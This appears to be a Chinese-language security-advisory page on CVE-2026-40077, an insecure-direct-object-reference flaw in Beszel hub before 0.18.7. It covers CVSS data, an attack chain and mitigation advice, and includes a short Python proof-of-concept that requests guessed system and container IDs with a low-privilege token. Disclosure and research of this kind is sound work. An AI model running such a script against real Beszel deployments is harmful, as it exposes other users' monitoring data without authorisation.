CVE-2026-40077 CVSS 3.5 低危

CVE-2026-40077 Beszel越权访问漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40077

漏洞类型

越权访问 (IDOR)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Beszel

漏洞概述

Beszel服务器监控平台0.18.7之前版本存在越权访问漏洞。由于特定API端点缺乏对用户访问权限的充分验证，攻击者只需拥有低权限账号，即可通过枚举系统ID和容器ID，绕过限制获取任意系统的敏感信息，造成数据泄露风险。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）。在Beszel Hub的某些API端点中，系统接收用户提交的system ID参数，但在处理请求前未验证当前用户是否拥有该系统ID的访问权限。系统ID虽为15位随机字符串，但理论上可通过Web API进行暴力枚举。一旦获取有效ID，攻击者可进一步枚举容器ID（12位十六进制），从而访问容器相关端点。利用此漏洞需要低权限用户身份，无需用户交互，通过网络即可发起攻击，导致受影响系统的机密性受损。

攻击链分析

STEP 1

信息收集

攻击者注册或获取一个低权限账号，并尝试通过Web API枚举有效的系统ID（15位字符）和容器ID。

STEP 2

漏洞利用

构造包含枚举出的系统ID和容器ID的API请求，发送至受影响的端点。

STEP 3

数据泄露

由于服务端未校验权限，返回了目标系统的敏感信息或容器数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-40077 POC
# Target: Beszel Hub < 0.18.7
# Description: Access arbitrary system data by guessing system ID.

TARGET_URL = "http://target-domain.com"
AUTH_TOKEN = "YOUR_AUTH_TOKEN_HERE" # Obtained after login
SYSTEM_ID = "GuessedSystemID" # 15 char alphanumeric
CONTAINER_ID = "GuessedContainerID" # 12 digit hex

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

# Example endpoint exploiting the vulnerability
exploit_url = f"{TARGET_URL}/api/systems/{SYSTEM_ID}/containers/{CONTAINER_ID}"

try:
    response = requests.get(exploit_url, headers=headers)
    if response.status_code == 200:
        print(f"[+] Success! Data leaked: {response.text}")
    else:
        print(f"[-] Failed with status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Beszel < 0.18.7

防御指南

临时缓解措施

如果无法立即升级，建议限制API访问频率以防止枚举攻击，或暂时禁用受影响的低权限用户访问敏感端点。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表